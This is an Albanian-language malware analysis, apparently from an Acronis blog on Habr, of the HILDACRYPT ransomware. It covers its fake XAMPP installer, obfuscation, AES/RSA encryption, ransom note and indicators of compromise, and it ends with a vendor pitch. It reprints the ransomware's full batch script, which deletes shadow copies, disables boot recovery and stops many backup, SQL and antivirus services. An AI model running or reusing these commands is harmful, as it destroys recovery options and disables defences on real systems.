HILDACRYPT: një program i ri kërkuesh që godet sistemet e backup-it dhe zgjidhjet antivirus

Përshëndetje, Habr! Sërish jemi këtu për t'ju treguar rreth versioneve më të reja të softuerëve të keq nga kategoria Ransomware. HILDACRYPT është një program i ri shantazhues, përfaqësues i familjes Hilda që u zbulua në gusht 2019, me emrin e nomsizuar sipas një karikature nga shërbimi i transmetimit Netflix, i cili u përdor për shpërndarjen e softuerit. Sot do të njohim karakteristikat teknike të funksionimit të këtij virusi shantazhues të përmirësuar.

HILDACRYPT: një program i ri kërkuesh që godet sistemet e backup-it dhe zgjidhjet antivirus

Në versionin e parë të shantazhuesve Hilda, linku për videon e publikuar në Youtube trailer i serialit animuar ishte përfshirë në lejimin për pagesën e shantazhit. HILDACRYPT fshehet pas një instaluesi legjitim XAMPP — një distribucion i lehtë për t'u instaluar Apache, që përfshin MariaDB, PHP dhe Perl. Gjithashtu, emri i skedarit të kripto-lokut është ndryshe — xamp. Për më tepër, skedari i programit shantazhues nuk ka një nënshkrim elektronik.

Analiza statike

Programi shantazhues është i pranishëm në një skedar PE32 .NET, i shkruar për MS Windows. Madhësia e tij është 135 168 byte. Si kodi kryesor programues ashtu edhe kodi i programit mbrojtës janë shkruar në C#. Sipas shënimit të datës dhe kohës së kompilimit, skedari binar është krijuar më 14 Shtator 2019.

HILDACRYPT: një program i ri kërkuesh që godet sistemet e backup-it dhe zgjidhjet antivirus

Sipas të dhënave nga Detect It Easy, ransomware është arkivuar me ndihmën e Confuser dhe ConfuserEx, por këto obfuskatore janë të njëjta si më parë, vetëm se ConfuserEx është pasardhësi i Confuser, kështu që nënshkrimet e kodeve të tyre janë të ngjashme.

HILDACRYPT: një program i ri kërkuesh që godet sistemet e backup-it dhe zgjidhjet antivirus

HILDACRYPT në të vërtetë është paketuar me ndihmën e ConfuserEx.

HILDACRYPT: një program i ri kërkuesh që godet sistemet e backup-it dhe zgjidhjet antivirus

SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a

Vektori i sulmit

Probabilisht, ransomware ishte zbuluar në një nga faqet e internetit që i kushtohet programimit në web, duke u maskuar si një program legjitim XAMPP.

E gjithë zinxhiri i infektimit mund të shihet në app.any.run sandbox.

Obfuskimi

Strings e ransomware-it ruhen në formë të enkriptuar. Kur HILDACRYPT ekzekutohet, ato i dekriptojnë me ndihmën e Base64 dhe AES-256-CBC.

HILDACRYPT: një program i ri kërkuesh që godet sistemet e backup-it dhe zgjidhjet antivirus

Instalimi

Së pari, ransomware krijon në %AppDataRoaming% një dosje, e cila ka një parameter GUID (Identifikuesi Globalisht Unik) të gjeneruar në mënyrë rastësore. Duke shtuar në këtë vendndodhje një skedar bat, ransomware ekzekuton atë me ndihmën e cmd.exe:

cmd.exe /c JKfgkgj3hjgfhjka.bat & exit

HILDACRYPT: një program i ri kërkuesh që godet sistemet e backup-it dhe zgjidhjet antivirusHILDACRYPT: një program i ri kërkuesh që godet sistemet e backup-it dhe zgjidhjet antivirus
Më pas fillon ekzekutimin e një skripe të paketës për të çaktivizuar funksionet ose shërbimet sistemike.

HILDACRYPT: një program i ri kërkuesh që godet sistemet e backup-it dhe zgjidhjet antivirus

Skripti përmban një listë të gjatë komandash, me anë të të cilave shuhen kopjet e errëta, ndalet SQL-serveri, bëhen kopje rezervë dhe zgjidhen zgjidhjet antivirus.

Për shembull, ai përpiqet pa sukses të ndalë shërbimet e kopjimit Acronis Backup. Për më tepër, ai sulmon sistemet e kopjimit dhe zgjidhjet antivirus të ofruesve të mëposhtëm: Veeam, Sophos, Kaspersky, McAfee dhe të tjerë.

@echo off
:: Nuk e kam për zemër ponit, vajzat e karikaturave janë më të mira, a nuk e mendoni kështu?
vssadmin resize shadowstorage \/for=c: \/on=c: \/maxsize=401MB
vssadmin resize shadowstorage \/for=c: \/on=c: \/maxsize=unbounded
vssadmin resize shadowstorage \/for=d: \/on=d: \/maxsize=401MB
vssadmin resize shadowstorage \/for=d: \/on=d: \/maxsize=unbounded
vssadmin resize shadowstorage \/for=e: \/on=e: \/maxsize=401MB
vssadmin resize shadowstorage \/for=e: \/on=e: \/maxsize=unbounded
vssadmin resize shadowstorage \/for=f: \/on=f: \/maxsize=401MB
vssadmin resize shadowstorage \/for=f: \/on=f: \/maxsize=unbounded
vssadmin resize shadowstorage \/for=g: \/on=g: \/maxsize=401MB
vssadmin resize shadowstorage \/for=g: \/on=g: \/maxsize=unbounded
vssadmin resize shadowstorage \/for=h: \/on=h: \/maxsize=401MB
vssadmin resize shadowstorage \/for=h: \/on=h: \/maxsize=unbounded
bcdedit \/set {default} recoveryenabled No
bcdedit \/set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows \/all \/quiet
net stop SQLAgent$SYSTEM_BGC \/y
net stop "Sophos Device Control Service" \/y
net stop macmnsvc \/y
net stop SQLAgent$ECWDB2 \/y
net stop "Zoolz 2 Service" \/y
net stop McTaskManager \/y
net stop "Sophos AutoUpdate Service" \/y
net stop "Sophos System Protection Service" \/y
net stop EraserSvc11710 \/y
net stop PDVFSService \/y
net stop SQLAgent$PROFXENGAGEMENT \/y
net stop SAVService \/y
net stop MSSQLFDLauncher$TPSAMA \/y
net stop EPSecurityService \/y
net stop SQLAgent$SOPHOS \/y
net stop "Symantec System Recovery" \/y
net stop Antivirus \/y
net stop SstpSvc \/y
net stop MSOLAP$SQL_2008 \/y
net stop TrueKeyServiceHelper \/y
net stop sacsvr \/y
net stop VeeamNFSSvc \/y
net stop FA_Scheduler \/y
net stop SAVAdminService \/y
net stop EPUpdateService \/y
net stop VeeamTransportSvc \/y
net stop "Sophos Health Service" \/y
net stop bedbg \/y
net stop MSSQLSERVER \/y
net stop KAVFS \/y
net stop Smcinst \/y
net stop MSSQLServerADHelper100 \/y
net stop TmCCSF \/y
net stop wbengine \/y
net stop SQLWriter \/y
net stop MSSQLFDLauncher$TPS \/y
net stop SmcService \/y
net stop ReportServer$TPSAMA \/y
net stop swi_update \/y
net stop AcrSch2Svc \/y
net stop MSSQL$SYSTEM_BGC \/y
net stop VeeamBrokerSvc \/y
net stop MSSQLFDLauncher$PROFXENGAGEMENT \/y
net stop VeeamDeploymentService \/y
net stop SQLAgent$TPS \/y
net stop DCAgent \/y
net stop "Sophos Message Router" \/y
net stop MSSQLFDLauncher$SBSMONITORING \/y
net stop wbengine \/y
net stop MySQL80 \/y
net stop MSOLAP$SYSTEM_BGC \/y
net stop ReportServer$TPS \/y
net stop MSSQL$ECWDB2 \/y
net stop SntpService \/y
net stop SQLSERVERAGENT \/y
net stop BackupExecManagementService \/y
net stop SMTPSvc \/y
net stop mfefire \/y
net stop BackupExecRPCService \/y
net stop MSSQL$VEEAMSQL2008R2 \/y
net stop klnagent \/y
net stop MSExchangeSA \/y
net stop MSSQLServerADHelper \/y
net stop SQLTELEMETRY \/y
net stop "Sophos Clean Service" \/y
net stop swi_update_64 \/y
net stop "Sophos Web Control Service" \/y
net stop EhttpSrv \/y
net stop POP3Svc \/y
net stop MSOLAP$TPSAMA \/y
net stop McAfeeEngineService \/y
net stop "Veeam Backup Catalog Data Service" \/y
net stop MSSQL$SBSMONITORING \/y
net stop ReportServer$SYSTEM_BGC \/y
net stop AcronisAgent \/y
net stop KAVFSGT \/y
net stop BackupExecDeviceMediaService \/y
net stop MySQL57 \/y
net stop McAfeeFrameworkMcAfeeFramework \/y
net stop TrueKey \/y
net stop VeeamMountSvc \/y
net stop MsDtsServer110 \/y
net stop SQLAgent$BKUPEXEC \/y
net stop UI0Detect \/y
net stop ReportServer \/y
net stop SQLTELEMETRY$ECWDB2 \/y
net stop MSSQLFDLauncher$SYSTEM_BGC \/y
net stop MSSQL$BKUPEXEC \/y
net stop SQLAgent$PRACTTICEBGC \/y
net stop MSExchangeSRS \/y
net stop SQLAgent$VEEAMSQL2008R2 \/y
net stop McShield \/y
net stop SepMasterService \/y
net stop "Sophos MCS Client" \/y
net stop VeeamCatalogSvc \/y
net stop SQLAgent$SHAREPOINT \/y
net stop NetMsmqActivator \/y
net stop kavfsslp \/y
net stop tmlisten \/y
net stop ShMonitor \/y
net stop MsDtsServer \/y
net stop SQLAgent$SQL_2008 \/y
net stop SDRSVC \/y
net stop IISAdmin \/y
net stop SQLAgent$PRACTTICEMGT \/y
net stop BackupExecJobEngine \/y
net stop SQLAgent$VEEAMSQL2008R2 \/y
net stop BackupExecAgentBrowser \/y
net stop VeeamHvIntegrationSvc \/y
net stop masvc \/y
net stop W3Svc \/y
net stop "SQLsafe Backup Service" \/y
net stop SQLAgent$CXDB \/y
net stop SQLBrowser \/y
net stop MSSQLFDLauncher$SQL_2008 \/y
net stop VeeamBackupSvc \/y
net stop "Sophos Safestore Service" \/y
net stop svcGenericHost \/y
net stop ntrtscan \/y
net stop SQLAgent$VEEAMSQL2012 \/y
net stop MSExchangeMGMT \/y
net stop SamSs \/y
net stop MSExchangeES \/y
net stop MBAMService \/y
net stop EsgShKernel \/y
net stop ESHASRV \/y
net stop MSSQL$TPSAMA \/y
net stop SQLAgent$CITRIX_METAFRAME \/y
net stop VeeamCloudSvc \/y
net stop "Sophos File Scanner Service" \/y
net stop "Sophos Agent" \/y
net stop MBEndpointAgent \/y
net stop swi_service \/y
net stop MSSQL$PRACTICEMGT \/y
net stop SQLAgent$TPSAMA \/y
net stop McAfeeFramework \/y
net stop "Enterprise Client Service" \/y
net stop SQLAgent$SBSMONITORING \/y
net stop MSSQL$VEEAMSQL2012 \/y
net stop swi_filter \/y
net stop SQLSafeOLRService \/y
net stop BackupExecVSSProvider \/y
net stop VeeamEnterpriseManagerSvc \/y
net stop SQLAgent$SQLEXPRESS \/y
net stop OracleClientCache80 \/y
net stop MSSQL$PROFXENGAGEMENT \/y
net stop IMAP4Svc \/y
net stop ARSM \/y
net stop MSExchangeIS \/y
net stop AVP \/y
net stop MSSQLFDLauncher \/y
net stop MSExchangeMTA \/y
net stop TrueKeyScheduler \/y
net stop MSSQL$SOPHOS \/y
net stop "SQL Backups" \/y
net stop MSSQL$TPS \/y
net stop mfemms \/y
net stop MsDtsServer100 \/y
net stop MSSQL$SHAREPOINT \/y
net stop WRSVC \/y
net stop mfevtp \/y
net stop msftesql$PROD \/y
net stop mozyprobackup \/y
net stop MSSQL$SQL_2008 \/y
net stop SNAC \/y
net stop ReportServer$SQL_2008 \/y
net stop BackupExecAgentAccelerator \/y
net stop MSSQL$SQLEXPRESS \/y
net stop MSSQL$PRACTTICEBGC \/y
net stop VeeamRESTSvc \/y
net stop sophossps \/y
net stop ekrn \/y
net stop MMS \/y
net stop "Sophos MCS Agent" \/y
net stop RESvc \/y
net stop "Acronis VSS Provider" \/y
net stop MSSQL$VEEAMSQL2008R2 \/y
net stop MSSQLFDLauncher$SHAREPOINT \/y
net stop "SQLsafe Filter Service" \/y
net stop MSSQL$PROD \/y
net stop SQLAgent$PROD \/y
net stop MSOLAP$TPS \/y
net stop VeeamDeploySvc \/y
net stop MSSQLServerOLAPService \/y
del %0

Pasi që shërbimet dhe proceset e përmendura më sipër janë çaktivizuar, kriptolokeri mbledh informacione mbi të gjitha proceset që janë në funksion, duke përdorur komandën tasklist, për t'u siguruar që të gjitha shërbimet e nevojshme janë të papunë.
tasklist v /fo csv

Me këtë komandë shfaqet një listë e detajuar e proceseve në funksion, elementet e së cilës janë të ndara me shenjën ','.
««csrss.exe»,«448»,«shërbimet»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»

HILDACRYPT: një program i ri kërkuesh që godet sistemet e backup-it dhe zgjidhjet antivirus

Pasi të përfundojë kjo kontrol, programa e pengimit fillon procesin e enkriptimit.

Enkriptim

Enkriptimi i skedarëve

HILDACRYPT kalon nëpër të gjitha përmbajtjet e gjetura në hard diskët, përveç dosjeve Recycle.Bin dhe Reference AssembliesMicrosoft. Në këtë të fundit përmbahen skedarë kritikë dll, pdb, etj., për aplikacionet .Net, të cilat mund të ndikojnë në funksionimin e programit të pengimit. Për të kërkuar skedarë që do të enkriptohen, përdoret lista e mëposhtme e zgjerimeve:

«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»

Për enkriptimin e skedarëve të përdoruesit, programi kërkesë-rrëmbim përdor algoritmin AES-256-CBC. Madhësia e çelësit është 256 bit, dhe madhësia e vektorit të inicializimit (IV) është 16 byte.

HILDACRYPT: një program i ri kërkuesh që godet sistemet e backup-it dhe zgjidhjet antivirus

Në ekranin pasues, vlerat byte_2 dhe byte_1 janë marrë në mënyrë të rastësishme me anë të GetBytes().

HILDACRYPT: një program i ri kërkuesh që godet sistemet e backup-it dhe zgjidhjet antivirus

Çelësi

HILDACRYPT: një program i ri kërkuesh që godet sistemet e backup-it dhe zgjidhjet antivirus

VI

HILDACRYPT: një program i ri kërkuesh që godet sistemet e backup-it dhe zgjidhjet antivirus

Skedari i enkriptuar ka zgjerimin HCY!.. Ky është një shembull i skedarit të enkriptuar. Për këtë skedar janë krijuar çelësi dhe IV që u përmendën më parë.

HILDACRYPT: një program i ri kërkuesh që godet sistemet e backup-it dhe zgjidhjet antivirus

Enkriptimi i çelësve

Krypto-lokatori ruan çelësin AES të gjeneruar në skedarin e enkriptuar. Pjesa e parë e skedarit të enkriptuar ka një titull që përmban të dhëna si HILDACRYPT, KEY, IV, FileLen në formatin XML, dhe duket si më poshtë:

HILDACRYPT: një program i ri kërkuesh që godet sistemet e backup-it dhe zgjidhjet antivirus

Enkriptimi i çelësit AES dhe IV bëhet me anë të RSA-2048, dhe kodimi me Base64. Çelësi publik RSA ruhet në trupin e krypto-lokatorit në një nga vargjet e enkriptuara në formatin XML.

28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB

Për enkriptimin e çelësit të skedarit AES përdoret çelësi publik RSA. Çelësi publik RSA është koduar me Base64 dhe përbëhet nga moduli dhe eksponenti publik 65537. Për dekriptimin kërkohet çelësi privat RSA, i cili ndodhet tek sulmuesi.

Pas RSA-kriptimit, çelësi AES kodifikohet me anë të Base64, i ruajtur në skedarin e enkriptuar.

Mesazhi i shpërblimit

Pas përfundimit të enkriptimit, HILDACRYPT shkruan një skedar html në atë dosje ku ka enkriptuar skedarët. Njoftimi i programit kërkues përmban dy adresa elektronike, përmes të cilave viktima mund të kontaktojë me sulmuesin.

  • hildalolilovesyou@airmail.cc
    hildalolilovesyou@memeware.net

HILDACRYPT: një program i ri kërkuesh që godet sistemet e backup-it dhe zgjidhjet antivirus

Njoftimi i kërkuesit përmban gjithashtu frazën «No loli is safe;)» — «Asnjë loli nuk është në siguri;)», një referencë për personazhe të ndaluara në Japoni me pamjen e vajzave të vogla në anime dhe manga.

Përfundim

HILDACRYPT, një familje e re e programeve kërkuese, ka lëshuar një version të ri. Modeli i enkriptimit nuk i lejon viktimës që të dekodifikojë skedarët e enkriptuar nga programi kërkues. Kriptolokeri përdor metoda mbrojtjeje aktive për të çaktivizuar shërbimet mbrojtëse që lidhen me sistemet e rezervimit dhe zgjidhjeve antivirus. Autori i HILDACRYPT është një adhurues i serisë animuese Hilda, e cila tregohet përmes Netflix-it, dhe lidhja për qëtrësin e saj u përfshi në letrën për shpërblimin e versionit të mëparshëm të programit.

Si zakonisht, Acronis Backup dhe Acronis True Image mund të mbrojnë kompjuterin tuaj nga programet e ransomit HILDACRYPT, ndërsa ofruesit kanë mundësinë të mbrojnë klientët e tyre nëpërmjet Acronis Backup Cloud. Mbrojtja sigurohet përmes faktit se këto zgjidhje përfshijnë sigurinë kibernetike , e cila përfshin jo vetëm kopjimin e rezervave, por gjithashtu sistemin tonë të integruar të mbrojtjes Acronis Active Protection — një model i forcuar nga mësimi i makinerive dhe i bazuar në heuristika të sjelljes, teknologji e cila, si asnjë tjetër, është në gjendje të përballojë kërcënimet nga programet e ransomit të ditës zero.

Të dhënat për komprometimin

Zgjatja e skedarit HCY!
HILDACRYPTReadMe.html
xamp.exe me një shkronjë «p» dhe pa nënshkrim digjital
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a

Burimi: habr.com

Bleni hostim të besueshëm për faqe me mbrojtje nga DDoS, serverë VPS VDS 🔥 Bleni hostim të besueshëm për faqe me mbrojtje nga DDoS, serverë VPS VDS | ProHoster